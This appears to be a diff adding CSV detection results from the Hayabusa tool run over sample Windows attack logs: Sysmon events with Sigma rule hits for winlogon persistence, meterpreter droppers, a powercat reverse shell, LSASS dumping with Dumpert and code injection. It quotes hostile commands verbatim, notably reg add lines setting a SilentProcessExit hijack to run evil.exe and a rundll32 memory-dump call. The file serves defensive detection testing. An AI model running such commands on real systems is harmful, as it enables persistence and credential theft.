+2019-06-15 07:23:06.691 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}  :  Path: C:\Windows\System32\dllhost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:07.019 +09:00,IEWIN7,1,informational,Process Creation,Command: efsui.exe /efs /keybackup  :  Path: C:\Windows\System32\efsui.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:07.082 +09:00,IEWIN7,1,informational,Process Creation,Command: atbroker.exe  :  Path: C:\Windows\System32\AtBroker.exe  :  User: IEWIN7\IEUser  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:13.894 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe  :  Path: C:\Windows\System32\userinit.exe  :  User: IEWIN7\IEUser  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:13.957 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""  :  Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\userinit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:13.957 +09:00,IEWIN7,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:13.957 +09:00,IEWIN7,1,medium,Suspicious Userinit Child Process,,rules/sigma/process_creation/win_susp_userinit_child.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:13.972 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE  :  Path: C:\Windows\explorer.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:15.054 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\VBoxTray.exe""   :  Path: C:\Windows\System32\VBoxTray.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:16.592 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""  :  Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:23.405 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe""   :  Path: C:\Windows\System32\eventvwr.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:26.811 +09:00,IEWIN7,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:26.999 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmp7792.tmp""  :  Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 07:23:53.358 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}  :  Path: C:\Windows\System32\dllhost.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx
+2019-06-15 16:13:42.294 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta""   :  Path: C:\Windows\System32\mshta.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\update.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:14:32.809 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}  :  Path: C:\Windows\System32\dllhost.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:21:50.488 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html  :  Path: C:\Program Files\Internet Explorer\iexplore.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:21:51.035 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:540 CREDAT:275457 /prefetch:2  :  Path: C:\Program Files\Internet Explorer\iexplore.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:22:05.691 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WScript.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs""   :  Path: C:\Windows\System32\wscript.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,WScript or CScript Dropper,,rules/sigma/process_creation/win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
+2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx
+2019-06-20 02:22:37.897 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg  add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe"" /v GlobalFlag /t REG_DWORD /d 512   :  Path: C:\Windows\System32\reg.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:41.709 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg  add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v ReportingMode /t REG_DWORD /d 1   :  Path: C:\Windows\System32\reg.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:41.709 +09:00,IEWIN7,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:41.709 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:41.709 +09:00,IEWIN7,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:43.944 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg  add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v MonitorProcess /d ""C:\windows\temp\evil.exe""  :  Path: C:\Windows\System32\reg.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:43.944 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:45.694 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:55.397 +09:00,IEWIN7,1,informational,Process Creation,"Command: notepad  :  Path: C:\Windows\System32\notepad.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:22:58.944 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\windows\temp\evil.exe  :  Path: C:\Windows\Temp\evil.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\werfault.exe"" -s -t 1340 -i 1352 -e 1352 -c 0",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:23:01.928 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe   :  Path: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: taskeng.exe {9AAB3F76-4849-4F03-9560-B020B4D0233D} S-1-5-18:NT AUTHORITY\System:Service:,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:23:01.990 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe  :  Path: C:\Windows\System32\Macromed\Flash\FlashPlayerUpdateService.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:23:02.350 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe -check plugin  :  Path: C:\Windows\System32\Macromed\Flash\FlashUtil32_30_0_0_134_Plugin.exe  :  User: IEWIN7\IEUser  :  Parent Command: taskeng.exe {CF661A9C-C1B0-45D5-BC80-11E48F3A0B96} S-1-5-21-3583694148-1414552638-2922671848-1000:IEWIN7\IEUser:Interactive:LUA[1],rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:23:10.334 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\notepad.exe""   :  Path: C:\Windows\System32\notepad.exe  :  User: IEWIN7\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 02:23:11.694 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\windows\temp\evil.exe  :  Path: C:\Windows\Temp\evil.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""C:\Windows\system32\werfault.exe"" -s -t 3020 -i 2396 -e 2396 -c 0",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx
+2019-06-20 17:07:42.331 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\NETSTAT.EXE""  -na  :  Path: C:\Windows\System32\NETSTAT.EXE  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:42.331 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:48.909 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""cmd""  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:48.909 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:48.925 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""cmd""  :  Path: C:\Windows\System32\cmd.exe  :  User: IEWIN7\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:48.925 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:52.956 +09:00,IEWIN7,1,informational,Process Creation,"Command: whoami  :  Path: C:\Windows\System32\whoami.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""cmd""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:52.956 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:52.956 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-20 17:07:58.816 +09:00,IEWIN7,1,informational,Process Creation,"Command: systeminfo  :  Path: C:\Windows\System32\systeminfo.exe  :  User: IEWIN7\IEUser  :  Parent Command: ""cmd""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/powercat_revShell_sysmon_1_3.evtx
+2019-06-21 16:35:37.185 +09:00,alice.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path  :  Command: Outflank-Dumpert.exe  :  Path: C:\Users\administrator\Desktop\x64\Outflank-Dumpert.exe  :  User: insecurebank\Administrator  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:37.329 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:37.377 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.128 +09:00,alice.insecurebank.local,1,informational,Process Creation,"Command: rundll32.exe  .\Outflank-Dumpert-DLL.dll, Dump  :  Path: C:\Windows\System32\rundll32.exe  :  User: insecurebank\Administrator  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.259 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.264 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,critical,Dumpert Process Dumper,,rules/sigma/file_event/file_event_hack_dumpert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.729 +09:00,alice.insecurebank.local,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:35:50.749 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:36:50.450 +09:00,alice.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path  :  Command: AndrewSpecial.exe  :  Path: C:\Users\administrator\Desktop\AndrewSpecial.exe  :  User: insecurebank\Administrator  :  Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-06-21 16:36:51.682 +09:00,alice.insecurebank.local,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_11_outlfank_dumpert_and_andrewspecial_memdump.evtx
+2019-07-04 05:39:29.223 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.129 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.145 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.160 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.192 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.207 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
+2019-07-04 05:39:30.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Sysmon_meterpreter_ReflectivePEInjection_to_notepad_.evtx
